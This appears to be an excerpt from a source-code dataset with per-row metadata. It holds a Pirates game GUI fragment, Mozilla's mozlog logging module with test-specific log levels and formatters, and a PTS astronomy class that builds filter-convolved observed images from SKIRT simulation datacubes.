self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| en | 0.641047 | # File: C (Python 2.4) | 1.869808 | 2 |
mozmill-env/python/Lib/site-packages/mozlog/logger.py | lucashmorais/x-Bench | 0 | 9172 | <filename>mozmill-env/python/Lib/site-packages/mozlog/logger.py<gh_stars>0
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
        # The message can be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overriden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
        any effect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
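# A minimal usage sketch of the API above; the logger names, handler wiring
# and messages are illustrative assumptions:
#
#     log = getLogger('mozlog.example')          # MozLogger with a default MozFormatter handler
#     log.testStart('test_login.js')             # emits a TEST-START line
#     log.testPass('test_login.js | passed')     # emits a TEST-PASS line
#
#     # For structured JSON output, attach a handler that uses the JSONFormatter.
#     json_handler = StreamHandler()
#     json_handler.setFormatter(JSONFormatter())
#     json_log = getLogger('mozlog.example.json', handler=json_handler)
#     json_log.log_structured('test_end', {'_level': 'TEST-END', '_message': 'test_login.js'})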
| <filename>mozmill-env/python/Lib/site-packages/mozlog/logger.py<gh_stars>0
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
        # The message can be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overriden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
        any effect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
| en | 0.771504 | # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. # Some of the build slave environments don't see the following when doing # 'from logging import *' # see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35 # Define mozlog specific log levels # Define associated text of log levels MozLogger class which adds some convenience log levels related to automated testing in Mozilla and ability to output structured log messages. Logs a test start message Logs a test end message Logs a test pass message Logs a test fail message Logs a test known fail message Logs a process crash message Logs a structured message object. # If the logger is fed a level number unknown to the logging # module, getLevelName will return a string. Unfortunately, # the logging module will raise a type error elsewhere if # the level is not an integer. # The can message be None. This is expected, and shouldn't cause # unstructured formatters to fail. Log formatter for emitting structured JSON entries. # Default values determined by logger metadata # If this message was created by a call to log_structured, # anything specified by the caller's params should act as # an override. # For compatibility with callers using the printf like # API exposed by python logging, call the default formatter. MozFormatter class used to standardize formatting If a different format is desired, this can be explicitly overriden with the log handler's setFormatter() method Formatter.__init__ has fmt and datefmt parameters that won't have any affect on a MozFormatter instance. :param include_timestamp: if True, include formatted time at the beginning of the message # Handles padding so record levels align nicely # this protected member is used to define the format # used by the base Formatter's method Returns the logger with the specified name. If the logger doesn't exist, it is created. If handler is specified, adds it to the logger. Otherwise a default handler that logs to standard output will be used. :param name: The name of the logger to retrieve :param handler: A handler to add to the logger. If the logger already exists, and a handler is specified, an exception will be raised. To add a handler to an existing logger, call that logger's addHandler method. | 2.328867 | 2 |
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py | wdobbels/CAAPR | 7 | 9173 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.images Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
    This class makes observed images from the 'total' datacubes produced by a SKIRT
    simulation, by convolving them with broadband filter transmission curves.
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
        Make the observed images for the given simulation: convolve its datacubes with
        the filters, optionally set the WCS, convolve with the kernels, convert the
        units and write the results.
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
        Construct a Filter object for each of the configured filter names.
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
        Convolve each simulated datacube with the filter transmission curves to produce
        the observed images, either locally or on the specified remote host.
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
            # If a list of instruments is defined and this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
        Set the coordinate system loaded from the given file on all of the created images.
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
        Convolve each image with the kernel specified for its filter, either locally or
        on the specified remote host.
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
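To make the one-liner in instrument_name() concrete: it keeps whatever sits between the simulation prefix and the "_total.fits" suffix of a SKIRT output file name. A tiny stand-alone sketch (the path and prefix are made up, and the file-name split is redone with plain string operations instead of fs.name):
path = "/some/output/galaxy_earth_total.fits"   # hypothetical SKIRT 'total' datacube
prefix = "galaxy"                               # hypothetical simulation prefix
name = path.rsplit("/", 1)[-1]                  # "galaxy_earth_total.fits"
instr = name.split("_total.fits")[0].split(prefix + "_")[1]
print(instr)                                    # -> "earth"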
| #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined and this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
